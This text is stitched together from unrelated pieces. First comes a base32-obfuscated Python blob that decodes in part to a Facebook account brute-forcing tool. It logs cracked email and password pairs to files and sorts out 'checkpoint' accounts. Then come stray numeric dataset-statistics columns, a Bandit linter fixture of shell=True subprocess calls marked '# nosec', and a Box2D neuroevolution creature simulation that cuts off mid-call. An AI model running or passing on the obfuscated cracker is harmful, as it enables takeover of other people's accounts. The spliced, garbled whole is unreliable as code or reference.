QCAIDEMFYGC5BAHUQG64DFNYUCOQTSOV2GKLTUPB2COLBAE53SOKINBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAMRQXAYLUFZ3XE2LUMUUGK3LBNFWCAKZAE4QHYIBHEAVSA4DXEAVSAJ24NYTSSDIKEAQCAIBAEAQCAIBAE
AQCAIBAEAQCAIBAEAQCAIDEMFYGC5BOMNWG643FFAUQ2CRAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCA4DSNFXHIIBHLRXFY6BRMJNTCOZZGFWVWK25EBOHQMLCLMYTWOJSNVDG65LOMRSWILRHBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBYHE2LOOQQDKMRAFIQCOXDYGFRFWMJ3HE3W2XDYMUZFY6BZGVOHQOJQE4GQUIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQHA4TJNZ2CAJ24PAYWEWZRHM4TC3K3LR4GKMS4PA4WKXDYMI4V2IC4PAYWEWZRHM4TE3KVONSXE3TBNVSSAXDYGFRFWMJ3HEYW2OS4PAYWEWZRHM4TO3JAE4QCWIDFNVQWS3ANBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAOBZGS3TUEATVY6BRMJNTCOZZGFWVWXDYMUZFY6BZMVOHQYRZLUQFY6BRMJNTCOZZGJWVAYLTON3W64TEEBOHQMLCLMYTWOJRNU5FY6BRMJNTCOZZG5WSAJZAFMQHA5YNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBANNSWY5LBOIUCSDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAMVWHGZJ2BUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBUWMIBHO53XOLTGMFRWKYTPN5VS4Y3PNUTSA2LOEBWXA43ILMTWK4TSN5ZF63LTM4TV2OQNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDDMVVXGIB5EBXXAZLOFATUE4TVORSWGZLLOBXWS3TUFZ2HQ5BHFQQCO5ZHFEGQUIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBRWK23TFZ3XE2LUMUUGK3LBNFWCAKZAE4QHYIBHEAVSA4DXEAVSAJ24NYTSSDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAY3FNNZS4Y3MN5ZWKKBJBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAOBZGS3TUEATVY3S4PAYWEWZRHM4TC3K3FNOSAXDYGFRFWMJ3HEZG2RTPOVXGIZLEFYTQ2CRAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQHA4TJNZ2CAIBCLQYDGM23GE5TGNR3GQYG2IHCTCC6FFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCSWIOFFMQ4KKZBYUVSDRJLEHCTCCSEDIKEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCA4DSNFXHIIBHLR4DCYS3GE5TSMLNLMQV2IC4PAYWEWZRHM4TG3KBMNRW65LOOQQE2YLZMJSSAQ3IMVRWW4DPNFXHIJYNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIDQOJUW45BAE5OHQMLCLMYTWOJRNVNVY6DFGJOHQOLFLR4GEOK5EBOHQMLCLMYTWOJSNVKXGZLSNZQW2ZJALR4DCYS3GE5TSMLNHJOHQMLCLMYTWOJXNUQCOIBLEBSW2YLJNQGQUIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBYHE2LOOQQCOXDYGFRFWMJ3HEYW2W24PBSTEXDYHFSVY6DCHFOSAXDYGFRFWMJ3HEZG2UDBONZXO33SMQQFY6BRMJNTCOZZGFWTUXDYGFRFWMJ3H
E3W2IBHEAVSA4DXBUFCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEAQCAIBANNSWY5LBOIUCSDIKEAQCAIBAEAQCAIBAEAQCAIBAEBSXQY3FOB2CA4TFOF2WK43UOMXGK6DDMVYHI2LPNZZS4Q3PNZXGKY3UNFXW4RLSOJXXEOQNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEBYHE2LOOQQCOXDYGFRFWMJ3HEYW2WZBLUQEG33ONZSWG5DJN5XCARLSOJXXEJYNBIQCAIBAEAQCAIBAEAQCAIBAEAQCAIBAEB2GS3LFFZZWYZLFOAUDCKINBIGQUIBAEAQCAIBAEBSXQY3FOB2CASKPIVZHE33SHIGQUIBAEAQCAIBAEAQCAIBAOBZGS3TUEATVY6BRMJNTCOZZGFWVWIK5EBDGS3DFEBXG65BAMZXXK3TEFYXC4JYNBIQCAIBAEAQCAIBAEAQCA4DSNFXHIIBCEIRFY3S4PAYWEWZRHM4TC3K3EFOSAXDYGFRFWMJ3HEZG2TDPN5VXGIDMNFVWKIDZN52SAZDPNYTXIIDIMF3GKIDBEB3W64TENRUXG5BCEIRA2CRAEAQCAIBAEAQCAIBAEBZXK4DFOIUCSDIKBUFGSZRAL5PW4YLNMVPV6IB5HUQCOX27NVQWS3S7L4TTUDIKBFWG6Z3JNYUCSDIK'))
| 20,356
| 40,698
| 0.999779
| 6
| 40,712
| 6,783.833333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106092
| 0.000049
| 40,712
| 2
| 40,698
| 20,356
| 0.893736
| 0
| 0
| 0
| 0
| 0
| 0.998993
| 0.998993
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
c699791140938bcc877527a9d6c594c6b8ad23a6
| 1,115
|
py
|
Python
|
examples/nosec.py
|
bittner/bandit
|
87ecc4079ea50d77be13ed72bbf5ad2eb0673c64
|
[
"Apache-2.0"
] | null | null | null |
examples/nosec.py
|
bittner/bandit
|
87ecc4079ea50d77be13ed72bbf5ad2eb0673c64
|
[
"Apache-2.0"
] | null | null | null |
examples/nosec.py
|
bittner/bandit
|
87ecc4079ea50d77be13ed72bbf5ad2eb0673c64
|
[
"Apache-2.0"
] | null | null | null |
subprocess.Popen('/bin/ls *', shell=True) #nosec (on the line)
subprocess.Popen('/bin/ls *', #nosec (at the start of function call)
shell=True)
subprocess.Popen('/bin/ls *',
shell=True) #nosec (on the specific kwarg line)
subprocess.Popen('#nosec', shell=True)
subprocess.Popen('/bin/ls *', shell=True) # type: ... # nosec # noqa: E501 ; pylint: disable=line-too-long
subprocess.Popen('/bin/ls *', shell=True) # type: ... # nosec B607 # noqa: E501 ; pylint: disable=line-too-long
subprocess.Popen('/bin/ls *', shell=True) #nosec subprocess_popen_with_shell_equals_true (on the line)
subprocess.Popen('#nosec', shell=True) # nosec B607, B602
subprocess.Popen('#nosec', shell=True) # nosec B607 B602
subprocess.Popen('/bin/ls *', shell=True) # nosec subprocess_popen_with_shell_equals_true start_process_with_partial_path
subprocess.Popen('/bin/ls *', shell=True) # type: ... # noqa: E501 ; pylint: disable=line-too-long # nosec
subprocess.Popen('#nosec', shell=True) # nosec B607, B101
subprocess.Popen('#nosec', shell=True) # nosec B602, subprocess_popen_with_shell_equals_true
| 69.6875
| 122
| 0.707623
| 157
| 1,115
| 4.904459
| 0.203822
| 0.311688
| 0.187013
| 0.207792
| 0.881818
| 0.850649
| 0.725974
| 0.592208
| 0.507792
| 0.406494
| 0
| 0.034091
| 0.131839
| 1,115
| 15
| 123
| 74.333333
| 0.761364
| 0.463677
| 0
| 1
| 0
| 0
| 0.175862
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c6b41f0efd400e06be58e95b38c0c907ff3f93df
| 36,315
|
py
|
Python
|
creatures.py
|
gweltou/Neuranim
|
e3805bf3b4ff9f386855734535730b9fcd72a340
|
[
"MIT"
] | 2
|
2019-11-03T03:21:31.000Z
|
2022-02-16T03:15:38.000Z
|
creatures.py
|
gweltou/Neuranim
|
e3805bf3b4ff9f386855734535730b9fcd72a340
|
[
"MIT"
] | null | null | null |
creatures.py
|
gweltou/Neuranim
|
e3805bf3b4ff9f386855734535730b9fcd72a340
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from Box2D.b2 import pi, vec2, world, circleShape, polygonShape, staticBody, dynamicBody, fixtureDef
import numpy as np
import uuid
from parameters import *
from nn import *
class Animatronic(object):
    """Abstract base class for a Box2D creature driven by a neural network.

    Subclasses are expected to provide ``init_body()`` (populating
    ``self.body``, ``self.bodies`` and ``self.joints``) and ``update()``,
    and to attach a network at ``self.nn``.
    """

    def __init__(self, world):
        """Store the Box2D world and assign a unique id to this creature."""
        # The first field of a time-based UUID is enough to tell creatures
        # apart within one run; it is used as the key for contact sensors.
        self.id = uuid.uuid1().fields[0]
        self.world = world
        self.score = 0
        self.sensors = []

    def set_start_position(self, x, y):
        """Set the spawn position used later by init_body()."""
        self.start_position = vec2(x, y)

    def set_target(self, x, y):
        """Set the point the creature will try to walk towards."""
        self.target = vec2(x, y)

    def get_position(self):
        """Return the (x, y) coordinates of the main body."""
        pos = self.body.position
        return pos.x, pos.y

    def set_category(self, n):
        """Put every fixture of this creature in collision category 2**n.

        maskBits = 1 restricts collisions to category-1 objects (the ground),
        so different creatures pass through each other.
        """
        cat = 2**n
        for body in self.bodies:
            for fix in body.fixtures:
                fix.filterData.categoryBits = cat
                fix.filterData.maskBits = 1
                if fix.filterData.groupIndex == 0:
                    # NOTE(review): a shared positive groupIndex forces
                    # same-creature fixtures to always collide with each
                    # other; the original author observed problems when a
                    # creature's limbs collide with its body — confirm.
                    fix.filterData.groupIndex = cat

    def copy(self):
        """Return a new creature of the same class with a copied network."""
        duplicate = self.__class__(self.world)
        duplicate.nn = self.nn.copy()
        duplicate.pop_id = self.pop_id
        return duplicate

    def mutate(self, frequency=2):
        """Randomly mutate synapse weights in place.

        Each synapse is selected with probability roughly
        ``frequency / total_synapses``.  A selected weight is redrawn
        uniformly in [-1, 1); values close to 0 are snapped to 0
        ("deactivated"), and weights already at 0 are left untouched so
        deactivated synapses stay deactivated.

        Returns the number of synapses selected for mutation.
        """
        total_synapses = self.nn.get_total_synapses()
        # Guard: np.random.randint(0) raises ValueError, which the original
        # code hit for tiny networks or frequency > total_synapses.
        odds = max(1, total_synapses // frequency)
        mutation_count = 0
        for w in self.nn.weights:
            wf = w.flat
            for i in range(w.size):
                if np.random.randint(odds) == 0:
                    mutation_count += 1
                    # Another random weight between -1 and 1
                    r = np.random.random()*2 - 1.0
                    # Deactivate synapse if close enough to 0
                    if abs(r) < 0.02:
                        r = 0
                    # Keep deactivated synapses deactivated
                    if wf[i] != 0:
                        wf[i] = r
        return mutation_count

    def destroy(self):
        """Remove all of this creature's joints and bodies from the world."""
        for joint in self.joints:
            self.world.DestroyJoint(joint)
        for body in self.bodies:
            self.world.DestroyBody(body)
        self.world.contactListener.unregisterSensors(self.id)
class Cubotron1000(Animatronic):
    """Two-legged walker with a square body.

    Neural network input layer (n_inputs = 10):
    [pos.x] [pos.y] [joints x 4] [contact_sensors x 4]
    Contact sensors (index stored in the fixture userData):
    0 - left foot tip, 1 - left side of body,
    2 - right side of body, 3 - right foot tip
    """
    def __init__(self, world):
        # world: Box2D world the creature's bodies and joints will live in.
        super().__init__(world)
        self.morpho = "Cubotron1000"  # morphology tag for this body plan
        self.n_contact_sensors = 4
        # 2 target-direction inputs + 4 joint angles + 4 contact sensors
        self.n_inputs = 2+4+4
    def init_body(self):
        """Create all Box2D bodies, fixtures, contact sensors and joints.

        Order of defining joints and sensors is important:
        self.joints must be symetrical so it can be reversed for mirror mode.
        Sensors number (n):
        (0)-----x-----(1) [[[ BODY ]]] (2)-----x-----(3)
        """
        self.bodies = []
        # Main square body (1.0 x 1.0), spawned at the start position.
        self.body = self.world.CreateDynamicBody(position=self.start_position)
        self.body.CreatePolygonFixture(box=(0.5, 0.5), density=1, friction=0.3,
                                       userData = self,
                                       )
        # Ground/Body sensors: massless circles on the top corners; the
        # (creature id, sensor index) userData is how the contact listener
        # identifies them.
        self.body.CreateCircleFixture(pos=(-0.5, 0.5), radius=0.15,
                                      density=0,
                                      isSensor=True, userData = (self.id, 1)
                                      )
        self.body.CreateCircleFixture(pos=(0.5, 0.5), radius=0.15,
                                      density=0,
                                      isSensor=True, userData = (self.id, 2)
                                      )
        self.bodies.append(self.body)
        # Legs
        self.lleg = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lleg.CreatePolygonFixture(box=(0.3, 0.15), density=1,
                                                 friction=0.3,
                                                 userData = self,
                                                 )
        self.bodies.append(self.lleg)
        self.rleg = self.world.CreateDynamicBody(position=self.start_position)
        self.rleg.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3,
                                       userData = self,
                                       )
        self.bodies.append(self.rleg)
        # Feet
        self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
        self.lfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
                                        friction=0.3,
                                        userData = self,
                                        )
        ## Ground/Foot sensor (high friction, no bounce: this is the contact
        ## patch the creature walks on)
        self.lfoot.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
                                       density=1, friction=1.0, restitution=0.0,
                                       userData = (self.id, 0),
                                       )
        self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
        self.rfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
                                        friction=0.3,
                                        userData = self,
                                        )
        ## Ground/Foot sensor
        self.rfoot.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
                                       density=1, friction=1.0, restitution=0.0,
                                       userData = (self.id, 3),
                                       )
        self.bodies.append(self.lfoot)
        self.bodies.append(self.rfoot)
        # Let the world's contact listener track this creature's sensors.
        self.world.contactListener.registerSensors(self.id, self.n_contact_sensors)
        # Joints, defined left-to-right so reversing the list mirrors the
        # creature: ankle(L), hip(L), hip(R), ankle(R).
        self.joints = []
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.lleg,
                bodyB = self.lfoot,
                collideConnected = False,
                localAnchorA = (-0.3, 0),
                localAnchorB = (0.36, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.body,
                bodyB = self.lleg,
                collideConnected = False,
                localAnchorA = (-0.4, -0.45),
                localAnchorB = (0.3, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 20.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.body,
                bodyB = self.rleg,
                collideConnected = False,
                localAnchorA = (0.4, -0.45),
                localAnchorB = (-0.3, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 20.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.rleg,
                bodyB = self.rfoot,
                collideConnected = False,
                localAnchorA = (0.3, 0),
                localAnchorB = (-0.36, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
    def update(self, sensors, mirror=False):
        """Feed sensor readings through the network and drive the motors.

        sensors: list of contact-sensor readings, ordered left to right.
        mirror:  force mirror mode (otherwise entered when the target is to
                 the left, dpos.x < 0).
        """
        # Direction to target, clamped to unit length when far away.
        dpos = self.target - self.body.position
        if dpos.length > 1:
            dpos.Normalize()
        # Joint angles normalized from [0, 2*pi) onto [-1, 1).
        joint_angles = [(j.angle%(2*pi))/pi - 1 for j in self.joints]
        # Make the limbs angle list symmetric (second half *= -1)
        for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
            joint_angles[i] *= -1
        self.sensors = [dpos.x, dpos.y] + joint_angles + sensors
        if dpos.x < 0 or mirror:
            # Mirror mode: flip x, reverse joint and contact-sensor order so
            # the same network can walk in both directions.
            joint_angles = joint_angles[::-1]
            self.sensors = [-dpos.x, dpos.y] + joint_angles + sensors[::-1]
        self.nn.feedforward(self.sensors)
        if dpos.x < 0 or mirror:
            # Mirror mode: outputs are reversed and negated.
            self.joints[0].motorSpeed = -self.nn.output[3]*20
            self.joints[1].motorSpeed = -self.nn.output[2]*20
            self.joints[2].motorSpeed = -self.nn.output[1]*20
            self.joints[3].motorSpeed = -self.nn.output[0]*20
        else:
            for i in range(len(self.joints)):
                self.joints[i].motorSpeed = self.nn.output[i]*20
class Cubotron1001(Cubotron1000):
    """Cubotron1000 variant with one extra input: a body-angle sensor."""

    def __init__(self, world):
        super().__init__(world)
        self.morpho = "Cubotron1001"
        self.n_inputs += 1  # one extra slot for the body-angle reading

    def update(self, sensors, mirror=False):
        """Feed sensor readings through the network and drive the motors.

        sensors: contact-sensor readings, ordered left to right.
        mirror:  force mirror mode (also entered when the target lies to
                 the left of the body).
        """
        # Direction to the target, clamped to unit length when far away.
        offset = self.target - self.body.position
        if offset.length > 1:
            offset.Normalize()
        # Joint angles normalized from [0, 2*pi) onto [-1, 1).
        angles = [(joint.angle % (2*pi)) / pi - 1 for joint in self.joints]
        # Negate the second half so the list is left/right symmetric.
        first_right = len(angles)//2 + len(angles) % 2
        for k in range(first_right, len(angles)):
            angles[k] = -angles[k]
        # Body tilt, mapped from [-180, 180] degrees onto [-1, 1].
        tilt = ((self.bodies[0].angle + pi) % (2*pi) - pi) / pi
        mirrored = mirror or offset.x < 0
        if mirrored:
            # Mirror mode: flip x and reverse left/right ordering so the
            # same network can walk in both directions.
            self.sensors = [-offset.x, offset.y] + angles[::-1] + sensors[::-1] + [tilt]
        else:
            self.sensors = [offset.x, offset.y] + angles + sensors + [tilt]
        self.nn.feedforward(self.sensors)
        n_joints = len(self.joints)
        if mirrored:
            # Mirror mode: outputs reversed and negated.
            for k in range(n_joints):
                self.joints[k].motorSpeed = -self.nn.output[n_joints - 1 - k] * 20
        else:
            for k in range(n_joints):
                self.joints[k].motorSpeed = self.nn.output[k] * 20
class Weakotron1001(Cubotron1001):
    """
    Same as Cubotron1001 but with super weak motors
    (half the joint torque, and motor speeds scaled by 3 instead of 20).
    """
    def __init__(self, world):
        super().__init__(world)
        self.morpho = "Weakotron1001"  # morphology tag for this body plan
    def init_body(self):
        """Create all Box2D bodies, fixtures, contact sensors and joints.

        Order of defining joints and sensors is important:
        self.joints must be symetrical so it can be reversed for mirror mode.
        Sensors number (n):
        (0)-----x-----(1) [[[ BODY ]]] (2)-----x-----(3)
        """
        self.bodies = []
        # Main square body (1.0 x 1.0), spawned at the start position.
        self.body = self.world.CreateDynamicBody(position=self.start_position)
        self.body.CreatePolygonFixture(box=(0.5, 0.5), density=1, friction=0.3,
                                       userData = self,
                                       #groupIndex = -1
                                       )
        # Ground/Body sensors: massless circles on the top corners, identified
        # by (creature id, sensor index) in the contact listener.
        self.body.CreateCircleFixture(pos=(-0.5, 0.5), radius=0.15,
                                      density=0,
                                      isSensor=True, userData = (self.id, 1)
                                      )
        self.body.CreateCircleFixture(pos=(0.5, 0.5), radius=0.15,
                                      density=0,
                                      isSensor=True, userData = (self.id, 2)
                                      )
        self.bodies.append(self.body)
        # Legs
        self.lleg = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lleg.CreatePolygonFixture(box=(0.3, 0.15), density=1,
                                                 friction=0.3,
                                                 userData = self,
                                                 #groupIndex = -1
                                                 )
        self.bodies.append(self.lleg)
        self.rleg = self.world.CreateDynamicBody(position=self.start_position)
        self.rleg.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3,
                                       userData = self,
                                       #groupIndex = -1
                                       )
        self.bodies.append(self.rleg)
        # Feet
        self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
        self.lfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
                                        friction=0.3,
                                        userData = self,
                                        #groupIndex = -1
                                        )
        ## Ground/Foot sensor (high friction, no bounce: the contact patch)
        self.lfoot.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
                                       density=1, friction=1.0, restitution=0.0,
                                       userData = (self.id, 0),
                                       #groupIndex = -1
                                       )
        self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
        self.rfoot.CreatePolygonFixture(box=(0.36, 0.08), density=1,
                                        friction=0.3,
                                        userData = self,
                                        #groupIndex = -1
                                        )
        ## Ground/Foot sensor
        self.rfoot.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
                                       density=1, friction=1.0, restitution=0.0,
                                       userData = (self.id, 3),
                                       #groupIndex = -1
                                       )
        self.bodies.append(self.lfoot)
        self.bodies.append(self.rfoot)
        # Let the world's contact listener track this creature's sensors.
        self.world.contactListener.registerSensors(self.id, self.n_contact_sensors)
        # Joints left-to-right (ankle L, hip L, hip R, ankle R) so reversing
        # the list mirrors the creature.  Torques are half Cubotron1000's.
        self.joints = []
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.lleg,
                bodyB = self.lfoot,
                collideConnected = False,
                localAnchorA = (-0.3, 0),
                localAnchorB = (0.36, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 5.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.body,
                bodyB = self.lleg,
                collideConnected = False,
                localAnchorA = (-0.4, -0.45),
                localAnchorB = (0.3, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.body,
                bodyB = self.rleg,
                collideConnected = False,
                localAnchorA = (0.4, -0.45),
                localAnchorB = (-0.3, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.rleg,
                bodyB = self.rfoot,
                collideConnected = False,
                localAnchorA = (0.3, 0),
                localAnchorB = (-0.36, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 5.0
            ))
    def update(self, sensors, mirror=False):
        """Feed sensor readings through the network and drive the (weak) motors."""
        # Direction to target, clamped to unit length when far away.
        dpos = self.target - self.body.position
        if dpos.length > 1:
            dpos.Normalize()
        # Joint angles normalized from [0, 2*pi) onto [-1, 1).
        joint_angles = [(j.angle%(2*pi))/pi - 1 for j in self.joints]
        # Make the limbs angle list symmetric (second half *= -1)
        for i in range(len(joint_angles)//2 + len(joint_angles)%2, len(joint_angles)):
            joint_angles[i] *= -1
        # Add body angle sensor, range [-180, 180] maps to [-1, 1]
        body_angle = ((self.bodies[0].angle + pi) % (2 * pi) - pi) / pi
        self.sensors = [dpos.x, dpos.y] + joint_angles + sensors + [body_angle]
        if dpos.x < 0 or mirror:
            # Mirror mode: flip x and reverse left/right ordering.
            joint_angles = joint_angles[::-1]
            self.sensors = [-dpos.x, dpos.y] + joint_angles + sensors[::-1] + [body_angle]
        self.nn.feedforward(self.sensors)
        if dpos.x < 0 or mirror:
            # Mirror mode: outputs reversed and negated.
            self.joints[0].motorSpeed = -self.nn.output[3]*3
            self.joints[1].motorSpeed = -self.nn.output[2]*3
            self.joints[2].motorSpeed = -self.nn.output[1]*3
            self.joints[3].motorSpeed = -self.nn.output[0]*3
        else:
            # NOTE(review): unlike Cubotron1001.update, this branch ALSO
            # negates the outputs, so mirror mode only reverses joint order
            # without a sign flip — confirm this asymmetry is intended.
            self.joints[0].motorSpeed = -self.nn.output[0]*3
            self.joints[1].motorSpeed = -self.nn.output[1]*3
            self.joints[2].motorSpeed = -self.nn.output[2]*3
            self.joints[3].motorSpeed = -self.nn.output[3]*3
class Boulotron2000(Animatronic):
    """Round-bodied walker with two segmented legs (thigh + leg + foot).

    Neural network input layer (n_inputs = 15):
    [pos.x] [pos.y] [joints x 6] [contact_sensors x 6] [body_angle]
    Contact sensors (index stored in the fixture userData):
    0 - lfoot
    1 - lheel
    2 - lbody
    3 - rbody
    4 - rheel
    5 - rfoot
    Other sensors:
    - body_angle
    """
    def __init__(self, world):
        # world: Box2D world the creature's bodies and joints will live in.
        super().__init__(world)
        self.morpho = "Boulotron2000"  # morphology tag for this body plan
        self.n_contact_sensors = 6
        # 2 target-direction inputs + 6 joint angles + 6 contacts + tilt
        self.n_inputs = 2+6+6+1
    def init_body(self):
        """Create all Box2D bodies, fixtures, contact sensors and joints.

        Order of defining joints and sensors is important:
        self.joints must be symetrical so it can be reversed for mirror mode.
        Sensors number (n):
        (0)---X(1)-----x-----(2) [[[ BODY ]]] (3)-----x-----(4)X---(5)
        """
        self.bodies = []
        # Main round body, spawned at the start position.
        self.body = self.world.CreateDynamicBody(position=self.start_position)
        self.body.CreateCircleFixture(pos=(0.0, 0.0), radius=0.6, density=1.0,
                                      userData = self,)
        ## Ground/Body sensors: massless circles low on each side, identified
        ## by (creature id, sensor index) in the contact listener.
        self.body.CreateCircleFixture(pos=(-0.58, -0.1), radius=0.15,
                                      density=0,
                                      isSensor=True, userData = (self.id, 2))
        self.body.CreateCircleFixture(pos=(0.58, -0.1), radius=0.15,
                                      density=0,
                                      isSensor=True, userData = (self.id, 3))
        self.bodies.append(self.body)
        # Thighs (groupIndex -1: limbs of one creature never self-collide)
        self.lthigh = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3,
                                                   userData = self,)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.lthigh)
        self.rthigh = self.world.CreateDynamicBody(position=self.start_position)
        # NOTE(review): this is the only limb fixture created without
        # userData=self — presumably an omission; verify against the
        # contact-handling code before relying on fixture userData here.
        fixture = self.rthigh.CreatePolygonFixture(box=(0.3, 0.15), density=1, friction=0.3)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.rthigh)
        # Legs
        self.lleg = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lleg.CreatePolygonFixture(box=(0.36, 0.1), density=1, friction=0.3,
                                                 userData = self,)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.lleg)
        self.rleg = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.rleg.CreatePolygonFixture(box=(0.36, 0.1), density=1, friction=0.3,
                                                 userData = self,)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.rleg)
        ## Heel sensors (high friction, no bounce: solid contact patches)
        self.lleg.CreateCircleFixture(pos=(-0.36, 0), radius=0.15,
                                      density=1, friction=1.0, restitution=0.0,
                                      userData = (self.id, 1), groupIndex=-1)
        self.rleg.CreateCircleFixture(pos=(0.36, 0), radius=0.15,
                                      density=1, friction=1.0, restitution=0.0,
                                      userData = (self.id, 4), groupIndex=-1)
        # Feet
        self.lfoot = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.lfoot.CreatePolygonFixture(box=(0.2, 0.08), density=1, friction=0.3,
                                                  userData = self,)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.lfoot)
        self.rfoot = self.world.CreateDynamicBody(position=self.start_position)
        fixture = self.rfoot.CreatePolygonFixture(box=(0.2, 0.08), density=1, friction=0.3,
                                                  userData = self,)
        fixture.filterData.groupIndex = -1
        self.bodies.append(self.rfoot)
        ## Feet sensors
        self.lfoot.CreateCircleFixture(pos=(-0.2, 0), radius=0.15,
                                       density=1, friction=1.0, restitution=0.0,
                                       userData = (self.id, 0), groupIndex=-1)
        self.rfoot.CreateCircleFixture(pos=(0.2, 0), radius=0.15,
                                       density=1, friction=1.0, restitution=0.0,
                                       userData = (self.id, 5), groupIndex=-1)
        # Contact sensors: register with the world's contact listener.
        self.world.contactListener.registerSensors(self.id, self.n_contact_sensors)
        # Joints left-to-right (ankle L, knee L, hip L, hip R, knee R,
        # ankle R) so reversing the list mirrors the creature.
        self.joints = []
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.lleg,
                bodyB = self.lfoot,
                collideConnected = False,
                localAnchorA = (-0.36, 0),
                localAnchorB = (0.2, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.lthigh,
                bodyB = self.lleg,
                collideConnected = False,
                localAnchorA = (-0.3, 0),
                localAnchorB = (0.36, 0),
                referenceAngle = pi,
                enableMotor = True,
                motorSpeed = 0.0,
                maxMotorTorque = 10.0
            ))
        self.joints.append(
            self.world.CreateRevoluteJoint(
                bodyA = self.body,
                bodyB = self.lthigh,
                collideConnected = False,
